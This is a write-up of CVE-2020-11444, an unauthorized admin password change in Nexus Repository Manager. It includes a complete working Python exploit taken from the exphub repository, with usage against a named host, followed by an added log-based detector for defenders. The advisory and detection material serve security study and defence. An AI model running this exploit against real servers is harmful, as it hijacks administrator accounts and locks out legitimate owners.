(CVE-2020-11444) Nexus Repository Manager Unauthorized Password Change (Privilege Escalation)

1. Vulnerability Overview

The vulnerability stems from improper access control in the beta users REST API. The endpoint `PUT /service/rest/beta/security/users/{userId}/change-password` does not check that the caller is allowed to change the target user's password, so any authenticated user (an ordinary low-privilege account is enough) can send a crafted request that sets a new password for any account, including `admin`. Despite the name sometimes attached to this CVE, the exploit below does not execute code; it takes over the admin account, after which the attacker has full control of the repository manager.

2. Affected Versions

Nexus Repository Manager 3.x (OSS and Pro) up to and including 3.21.1; fixed in 3.21.2.

3. Reproduction
Usage: the second argument is the `NXSESSIONID` cookie of any valid login (a low-privilege user is sufficient), the third is the new password to set for `admin`:

```
python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "<NXSESSIONID>" "<new_admin_password>"
```

cve-2020-11444_exp.py:

```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub
import sys
import requests

if len(sys.argv) != 4:
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                          +')
    print('+ CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password)                              +')
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <session> <password>                                            +')
    print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456 +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                         +')
    print('+-----------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1].rstrip('/')
# Vulnerable endpoint: the beta users API accepts a password change for any
# user id from any authenticated session, so we target "admin" directly.
vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
session = sys.argv[2]   # NXSESSIONID of any valid (low-privilege) login
password = sys.argv[3]  # new password to set for admin

headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    # Nexus's anti-CSRF filter only requires that this header equal the
    # cookie of the same name, so any value works as long as both are set.
    'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
    'Content-Type': "text/plain",
    'Origin': "http://127.0.0.1:8081",
    'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=" + session,
}
# The request body is simply the new password as plain text.
data = password

r = requests.put(vuln_url, headers=headers, data=data, timeout=10)
# A 204 No Content means Nexus accepted and applied the new password.
if r.status_code == 204:
    print("[+] Password Change Success")
    print("[+] " + url)
    print("[+] Username:admin Password:" + password)
else:
    print("[-] SessionID Not available")
    print("[-] Target Not CVE-2020-11444 Vuln Good Luck")
sys.exit(0)
```

Note that this is destructive: a successful run replaces the real admin password, so on anything other than a lab instance it locks out the legitimate administrator.
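Defenders can spot this exploit (and attempts at it) in the Nexus `request.log`, because the request is a `PUT` to the `change-password` endpoint issued by a session whose user does not match the user id in the path. The detector below is an added example, not part of the original write-up or of the exphub repository; it assumes the default NCSA-style `request.log` layout (`clientHost identd user [date] "METHOD URL PROTO" status ...`) and the sample log lines are constructed for the demonstration. Matching on both `/beta/` and `/v1/` is an assumption to cover later API versions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumption: default Nexus 3 request.log layout, e.g.
#   10.0.0.9 - bob [20/Apr/2020:10:16:44 +0000] "PUT /path HTTP/1.1" 204 6 0 37 "UA" [thread]
# Adjust the pattern if your logback configuration differs.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The endpoint abused by CVE-2020-11444; /v1/ is included as an assumption
# for releases that moved the users API out of beta.
CHANGE_PW_RE = re.compile(
    r'^/service/rest/(?:beta|v1)/security/users/(?P<target>[^/]+)/change-password$'
)


@dataclass
class Finding:
    host: str
    actor: str    # authenticated user from the log ("-" if none)
    target: str   # user id from the URL path
    status: int   # 204 = Nexus applied the change, anything else = attempt
    ts: str
    reason: str


def parse_line(line: str) -> Optional[dict]:
    """Return the parsed fields of one request.log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines: List[str]) -> List[Finding]:
    """Flag change-password calls where the caller is not the account being changed."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "PUT":
            continue
        pm = CHANGE_PW_RE.match(rec["path"])
        if not pm:
            continue
        actor, target = rec["user"], pm.group("target")
        if actor == "-":
            reason = "unauthenticated change-password attempt"
        elif actor != target:
            reason = "cross-account password change"
        else:
            continue  # a user changing their own password is normal behaviour
        findings.append(Finding(rec["host"], actor, target, int(rec["status"]), rec["ts"], reason))
    return findings


# Constructed sample log lines (not real traffic): a benign status check, a
# self-service password change, an exploit run from a low-privilege session,
# a rejected unauthenticated attempt, and a line that does not parse.
SAMPLE_LOG = [
    '10.0.0.5 - alice [20/Apr/2020:10:15:01 +0000] "GET /service/rest/v1/status HTTP/1.1" 200 - 0 3 "curl/7.68.0" [qtp1-22]',
    '10.0.0.5 - alice [20/Apr/2020:10:15:07 +0000] "PUT /service/rest/beta/security/users/alice/change-password HTTP/1.1" 204 8 0 41 "Mozilla/5.0" [qtp1-23]',
    '10.0.0.9 - bob [20/Apr/2020:10:16:44 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 204 6 0 37 "Mozilla/5.0" [qtp1-24]',
    '10.0.0.9 - - [20/Apr/2020:10:17:02 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 401 6 0 5 "python-requests/2.23.0" [qtp1-25]',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f.ts}] {f.host} {f.actor} -> {f.target} status={f.status}: {f.reason}")
```

Run over the sample, the detector reports the `bob -> admin` change with status 204 (a successful takeover) and the unauthenticated 401 attempt, and ignores both the self-service change and the unrelated GET. In production, feed it the live `request.log` and treat any 204 finding as a confirmed account takeover that warrants resetting the target password and invalidating sessions.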
References
https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py